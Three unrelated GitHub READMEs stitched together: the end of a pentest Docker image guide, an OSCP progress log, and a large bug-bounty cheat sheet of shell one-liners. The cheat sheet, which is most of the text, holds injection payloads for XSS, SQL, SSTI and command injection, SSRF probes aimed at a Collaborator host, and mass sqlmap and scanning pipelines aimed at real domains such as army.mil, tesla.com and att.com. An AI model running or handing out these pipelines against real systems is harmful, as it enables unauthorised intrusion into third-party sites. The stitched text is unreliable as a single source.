1. Use the container to access HTB (Hack the Box) machines by HTB vpn.
docker run --rm -it --cap-add=NET_ADMIN --device=/dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 --name my-pentest aaaguirrep/pentest /bin/zsh
2. Share information from your local directory to container directory and save information on your local directory. You should save information under /pentest directory.
docker run --rm -it -v /path/to/local/directory:/pentest --name my-pentest aaaguirrep/pentest /bin/zsh
3. Expose internal container services (apache, squid) for your local environment.
docker run --rm -it --name my-pentest -p 80:80 -p 3128:3128 aaaguirrep/pentest /bin/zsh
Inside the container start apache2 and squid services by the aliases.
apacheUp
squidUp
4. Mount directories by umount command.
docker run --rm -it --privileged --name my-pentest aaaguirrep/pentest /bin/zsh
5. Tools are downloaded in /tools directory.
## :gear: Nice configurations
You can set up the docker image with nice configurations like as:
### 1. Configure credentials in the docker
To use access keys, tokens or API Keys in the docker review the next repo [docker-pentest-config](https://github.com/aaaguirrep/docker-pentest-config)
### 2. Alias to connect to HTB (Hack the Box) VPN
To use both options you should use -v option to map local directoty with /pentest container directory.
#### Option 1 - HTB VPN using github repository
Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container with the -v option.
RUN echo "alias vpnhtb=\"openvpn /pentest/path/to/ovpn/file\"" >> /root/.zshrc
#### Option 2 - HTB VPN using docker hub image
Create a new Dockerfile with the next steps, build a new image and run a new container with -v option.
FROM aaaguirrep/pentest
# Create a shortcut and load the ovpn file from workstation
RUN echo "alias vpnhtb=\"openvpn /pentest/path/to/ovpn/file\"" >> /root/.zshrc
### 3. Save and load command history in your local environment
When you delete a container all information is deleted incluide command history. The next configuration provides you an option for save the command history in your local environment and load it when you run a new container. So, you wont lose your command history when run a new container.
To use both options you should use -v option to map local directoty with /pentest container directory.
#### Option 1 - Command history using github repository
Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container.
# Save and load command history in your local environment
RUN sed -i '1i export HISTFILE="/pentest/.zsh_history"' /root/.zshrc
#### Option 2 - Command history using docker hub image
Create a new Dockerfile with the next steps, build a new image and run a new container.
FROM aaaguirrep/pentest
# Save and load command history in your local environment
RUN sed -i '1i export HISTFILE="/pentest/.zsh_history"' /root/.zshrc
## :white_check_mark: Environment tested
The image was tested in the following environments:
- Docker service for Mac: Docker version 19.03.5, build 633a0ea
- Docker service for Linux instance on Google Cloud Platform: Docker version 19.03.6, build 369ce74a3c
- Docker service for Linux droplet on Digital Ocean: Docker version 19.03.6, build 369ce74a3c
## :warning: Warning
- Do not save information on container directories because it will be lost after delete the container, you should save information in your local environment using the parameter -v when you run the container. For instance:
docker run --rm -it -v /path/to/local/directory:/pentest --name my-pentest aaaguirrep/pentest /bin/zsh
The above command specify a path local directory mapped with /pentest container directory. You should save all information under /pentest directory.
- Use hashcat and john the ripper on controlled environments as CTF. You can experiment issues.
## :coffee: Donations
Thanks for your donations, are always appreciated.
While I drink the coffee I check more tools to add in the docker image.
<a href="https://www.buymeacoffee.com/aaaguirrep" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" style="height: 23px !important; width: 100px !important;" ></a>
## Contributing
[Contributing Guide](CONTRIBUTING.md)
## :chart_with_upwards_trend: Stargazers over time
[![Stargazers over time](https://starchart.cc/aaaguirrep/pentest.svg)](https://starchart.cc/aaaguirrep/pentest)
## License
[MIT](LICENSE)
Copyright (c) 2020, Arsenio Aguirre
|
## UPDATES: Highly recommend OffSec Proving Grounds for OSCP preparation! My best ranking in December 2021 is 16 / 2147 students. I share my writeups of 50+ old PG Practice machines (please send a request):
https://drive.google.com/drive/folders/17KUupo8dF8lPJqUzjObIqQLup1h_py9t?usp=sharing
![best_ranking_offsec](https://user-images.githubusercontent.com/9584484/137512091-b5ffe0d9-d037-467b-8afc-ff0bab66be05.png)
========================================
To prepare for my future job as a security pentester, I plan to get the certificate [OSCP](https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/) next year. Before taking the exam, I need to take the course Penetration Testing with Kali Linux (PWK) provided by Offensive Security. This repo contains my notes of the journey and also keeps track of my progress.
### OSCP
- 01/03/2020: Start my journey
- Mar 01 - 08, 2020: rooted **6** machines (Alice, Alpha, Mike, Hotline, Kraken, Dotty) & got low shell **3** machines (Bob, FC4, Sean). Total: **6** machines.
- <span style="color:blue">Mar 09 - 15, 2020</span>: rooted **5** machines (Pain, Susie, Jeff, Phoenix, Beta) & got low shell **3** machines (Core, Disco, Leftturn). Total: <span style="color:red">**11**</span> machines.
- <span style="color:blue">Mar 16 - 22, 2020</span>: rooted **5** machines (Leftturn, Bethany, FC4, Core, Break). Total: <span style="color:red">**16**</span> machines.
- <span style="color:blue">Mar 23 - 29, 2020</span>: did some exercises (chapter 2, 3, 6), rooted **1** machines (Ralph) & unlocked **IT Department**. Total: <span style="color:red">**17**</span> machines.
- <span style="color:blue">Mar 30 - Apr 05, 2020</span>: rooted **7** machines (Bruce, Bob, Tophat, JD, Joe, Parrot, Sean) & got low shell **1** machines (Timeclock). Total: <span style="color:red">**24**</span> machines (found the same network-secret.txt of IT Dept on another machine).
- <span style="color:blue">Apr 06 - 12, 2020</span>: rooted **3** machines (Timeclock, Disco, Gh0st) & unlocked **DEV Department**. Total: <span style="color:red">**27**</span> machines.
### Try Hack Me (OSCP Preparation Path)
### Hack The Box
- 15/08/2019: Set VIP account and [connect](hackthebox/connect.md) to machines
- 15/08/2019: Solve [Lame](/hackthebox/Lame)
### Vulnhub
- 17/08/2019: Solve [Toppo](/vulnhub/Toppo)
### [Virtual Hacking Labs](https://www.virtualhackinglabs.com/)
- 11/2019 - 02/2020: Root all 43/43 machines
![Selection_383](https://user-images.githubusercontent.com/9584484/75338486-112dc000-588f-11ea-8081-f9bbf62a152d.png)
### Cheatsheet
- [Nmap](https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.1.pdf)
- [Metasploit](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
- [Windows Command Line](https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf)
### OSCP guides
- [OSCP Certification Exam Guide](https://support.offensive-security.com/oscp-exam-guide/)
- Offensive Security free courses: [Kali Linux Revealed](https://kali.training/), [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/). More [online training courses](https://www.offensive-security.com/information-security-training/)
- [PWK syllabus](penetration-testing-with-kali.pdf)
- [PWK support](https://support.offensive-security.com/pwk-support/)
- [PWK reporting](https://support.offensive-security.com/pwk-reporting/)
- [PWK Example Report](https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf), [doc format](https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc), [pentest report](https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf)
### OSCP tools
- [OSCP Approved Tools](https://medium.com/@falconspy/oscp-approved-tools-b2b4e889e707)
### OSCP reviews
- http://www.networkadminsecrets.com/2010/12/offensive-security-certified.html
- https://www.lewisecurity.com/i-am-finally-an-oscp/
- https://teckk2.github.io/category/OSCP.html
- Luke's Ultimate OSCP Guide: [part 1](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440), [part 2](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48), [part 3](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97)
- https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob
- http://www.lucas-bader.com/certification/2015/05/27/oscp-offensive-security-certified-professional
- http://www.securitysift.com/offsec-pwb-oscp/
- https://theslickgeek.com/oscp/
- https://www.jpsecnetworks.com/category/oscp/
- http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/
- https://alphacybersecurity.tech/my-fight-for-the-oscp/
- https://r3dg33k.com/2018-10-09-oscp-exp/
- https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/
- https://legacy.gitbook.com/book/sushant747/total-oscp-guide/details
- https://blackwintersecurity.com/oscp/
- https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html
- https://411hall.github.io/OSCP-Preparation/
- https://h4ck.co/oscp-journey-exam-lab-prep-tips/
- https://jhalon.github.io/OSCP-Review/
- https://sinw0lf.github.io/?fbclid=IwAR3JTBiIFpVZDoQuBKiMyx8VpBQP8TP8gWYASa__sKVrjUMCg7Z21VxrXKk
|
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1>
Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑
## Stats King
![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula)
[![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge)
## Join Us
[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA)
[![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah)
<div>
<a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a>
<a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a>
</div>
## BugBuntu Download
- [BugBuntu](https://sourceforge.net/projects/bugbuntu/)
- [@bt0s3c](https://twitter.com/bt0s3c)
- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)
## Special thanks
- [@bt0s3c](https://twitter.com/bt0s3c)
- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)
- [@Stokfredrik](https://twitter.com/stokfredrik)
- [@Jhaddix](https://twitter.com/Jhaddix)
- [@pdiscoveryio](https://twitter.com/pdiscoveryio)
- [@TomNomNom](https://twitter.com/TomNomNom)
- [@jeff_foley](https://twitter.com/@jeff_foley)
- [@NahamSec](https://twitter.com/NahamSec)
- [@j3ssiejjj](https://twitter.com/j3ssiejjj)
- [@zseano](https://twitter.com/zseano)
- [@pry0cc](https://twitter.com/pry0cc)
- [@wellpunk](https://twitter.com/wellpunk)
## Scripts that need to be installed
To run the project, you will need to install the following programs:
- [Amass](https://github.com/OWASP/Amass)
- [Anew](https://github.com/tomnomnom/anew)
- [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl)
- [Assetfinder](https://github.com/tomnomnom/assetfinder)
- [Airixss](https://github.com/ferreiraklet/airixss)
- [Axiom](https://github.com/pry0cc/axiom)
- [Bhedak](https://github.com/R0X4R/bhedak)
- [CF-check](https://github.com/dwisiswant0/cf-check)
- [Chaos](https://github.com/projectdiscovery/chaos-client)
- [Cariddi](https://github.com/edoardottt/cariddi)
- [Dalfox](https://github.com/hahwul/dalfox)
- [DNSgen](https://github.com/ProjectAnte/dnsgen)
- [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved)
- [Findomain](https://github.com/Edu4rdSHL/findomain)
- [Fuff](https://github.com/ffuf/ffuf)
- [Freq](https://github.com/takshal/freq)
- [Gargs](https://github.com/brentp/gargs)
- [Gau](https://github.com/lc/gau)
- [Gf](https://github.com/tomnomnom/gf)
- [Github-Search](https://github.com/gwen001/github-search)
- [Gospider](https://github.com/jaeles-project/gospider)
- [Gowitness](https://github.com/sensepost/gowitness)
- [Goop](https://github.com/deletescape/goop)
- [GetJS](https://github.com/003random/getJS)
- [Hakrawler](https://github.com/hakluke/hakrawler)
- [HakrevDNS](https://github.com/hakluke/hakrevdns)
- [Haktldextract](https://github.com/hakluke/haktldextract)
- [Haklistgen](https://github.com/hakluke/haklistgen)
- [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool)
- [Httpx](https://github.com/projectdiscovery/httpx)
- [Jaeles](https://github.com/jaeles-project/jaeles)
- [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder)
- [Kxss](https://github.com/Emoe/kxss)
- [LinkFinder](https://github.com/GerbenJavado/LinkFinder)
- [log4j-scan](https://github.com/fullhunt/log4j-scan)
- [Metabigor](https://github.com/j3ssie/metabigor)
- [MassDNS](https://github.com/blechschmidt/massdns)
- [Naabu](https://github.com/projectdiscovery/naabu)
- [Notify](https://github.com/projectdiscovery/notify)
- [Qsreplace](https://github.com/tomnomnom/qsreplace)
- [Rush](https://github.com/shenwei356/rush)
- [SecretFinder](https://github.com/m4ll0k/SecretFinder)
- [Shodan](https://help.shodan.io/command-line-interface/0-installation)
- [ShuffleDNS](https://github.com/projectdiscovery/shuffledns)
- [SQLMap](https://github.com/sqlmapproject/sqlmap)
- [Subfinder](https://github.com/projectdiscovery/subfinder)
- [SubJS](https://github.com/lc/subjs)
- [Unew](https://github.com/dwisiswant0/unew)
- [Unfurl](https://github.com/tomnomnom/unfurl)
- [Urldedupe](https://github.com/ameenmaali/urldedupe)
- [WaybackURLs](https://github.com/tomnomnom/waybackurls)
- [Wingman](https://xsswingman.com/#faq)
- [Goop](https://github.com/deletescape/goop)
- [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson)
- [X8](https://github.com/Sh1Yo/x8)
- [XSStrike](https://github.com/s0md3v/XSStrike)
- [Page-fetch](https://github.com/detectify/page-fetch)
### BBRF SCOPE DoD
```bash
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil'
```
### Scan log4j using BBRF and log4j-scan
- [Explained command](https://bit.ly/3IUivk9)
```bash
bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"'
```
### SSTI in qsreplase add "{{7*7}}" (0xJin)
```bash
cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt
ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
```
### urldedupe bhedak
- [Explained command]
```bash
waybackurls http://testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'
```
### Airixss XSS
- [Explained command]
```bash
echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
```
### FREQ XSS
- [Explained command]
```bash
echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'
```
### Bhedak
- [Explained command]
```bash
cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}"
```
### .bashrc shortcut OFJAAAH
```bash
reconjs(){
gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt
}
cert(){
curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew
}
anubis(){
curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
}
```
### Oneliner Haklistgen
- @hakluke
```bash
subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done
cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt;
```
### Running JavaScript on each page send to proxy.
- [Explained command]
```bash
cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080
```
### Running cariddi to Crawler
- [Explained command]
```bash
echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive
```
### Dalfox scan to bugbounty targets.
- [Explained command]
```bash
xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'
```
### Dalfox scan to bugbounty targets.
- [Explained command]
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
```
### Using x8 to Hidden parameters discovery
- [Explaining command]
```bash
assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'
```
### Extract .js Subdomains
- [Explaining command]
```bash
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
```
### goop to search .git files.
- [Explaining command]
```bash
xargs -a xss -P10 -I@ sh -c 'goop @'
```
### Using chaos list to enumerate endpoint
```bash
curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'
```
### Using Wingman to search XSS reflect / DOM XSS
- [Explaining command]
```bash
xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'
```
### Search ASN to metabigor and resolvers domain
- [Explaining command]
```bash
echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
```
### OneLiners
### Search .json gospider filter anti-burl
- [Explaining command]
```bash
gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl
```
### Search .json subdomain
- [Explaining command]
```bash
assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
```
### SonarDNS extract subdomains
- [Explaining command]
```bash
wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar
```
### Kxss to search param XSS
- [Explaining command]
```bash
echo http://testphp.vulnweb.com/ | waybackurls | kxss
```
### Recon subdomains and gau to search vuls DalFox
- [Explaining command]
```bash
assetfinder testphp.vulnweb.com | gau | dalfox pipe
```
### Recon subdomains and Screenshot to URL using gowitness
- [Explaining command]
```bash
assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
```
### Extract urls to source code comments
- [Explaining command]
```bash
cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
```
### Axiom recon "complete"
- [Explaining command]
```bash
findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u
```
### Domain subdomain extraction
- [Explaining command]
```bash
cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'
```
### Search .js using
- [Explaining command]
```bash
assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew
```
### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below.
- [Explaining command]
```bash
cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'
```
### My recon automation simple. OFJAAAH.sh
- [Explaining command]
```bash
chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1
```
### Download all domains to bounty chaos
- [Explaining command]
```bash
curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'
```
### Recon to search SSRF Test
- [Explaining command]
```bash
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
```
### ShuffleDNS to domains in file scan nuclei.
- [Explaining command]
```bash
xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1
```
### Search Asn Amass
- [Explaining command]
Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me)
```bash
amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''
```
### SQLINJECTION Mass domain file
- [Explaining command]
```bash
httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
```
### Using chaos search js
- [Explaining command]
Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com".
```bash
chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#]
```
### Search Subdomain using Gospider
- [Explaining command]
GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS
```bash
gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
```
### Using gospider to chaos
- [Explaining command]
GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.
```bash
chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3'
```
### Using recon.dev and gospider crawler subdomains
- [Explaining command]
We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces
If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains.
Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls.
```bash
curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
```
### PSQL - search subdomain using cert.sh
- [Explaining command]
Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs
```bash
psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew
```
### Search subdomains using github and httpx
- [Github-search]
Using python3 to search subdomains, httpx filter hosts by up status-code response (200)
```python
./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title
```
### Search SQLINJECTION using qsreplace search syntax error
- [Explained command]
```bash
grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"
```
### Search subdomains using jldc
- [Explained command]
```bash
curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
```
### Search subdomains in assetfinder using hakrawler spider to search links in content responses
- [Explained command]
```bash
assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"
```
### Search subdomains in cert.sh
- [Explained command]
```bash
curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew
```
### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD
- [Explained command]
```bash
curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
```
```bash
curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
```
### Collect js files from hosts up by gospider
- [Explained command]
```bash
xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'
```
### Subdomain search Bufferover resolving domain to httpx
- [Explained command]
```bash
curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew
```
### Using gargs to gospider search with parallel proccess
- [Gargs](https://github.com/brentp/gargs)
- [Explained command]
```bash
httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne
```
### Injection xss using qsreplace to urls filter to gospider
- [Explained command]
```bash
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
```
### Extract URL's to apk
- [Explained command]
```bash
apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"
```
### Chaos to Gospider
- [Explained command]
```bash
chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @
```
### Checking invalid certificate
- [Real script](https://bit.ly/2DhAwMo)
- [Script King](https://bit.ly/34Z0kIH)
```bash
xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx
```
### Using shodan & Nuclei
- [Explained command]
Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column.
httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.
```bash
shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/
```
### Open Redirect test using gf.
- [Explained command]
echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates.
```bash
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
```
### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles".
- [Explained command]
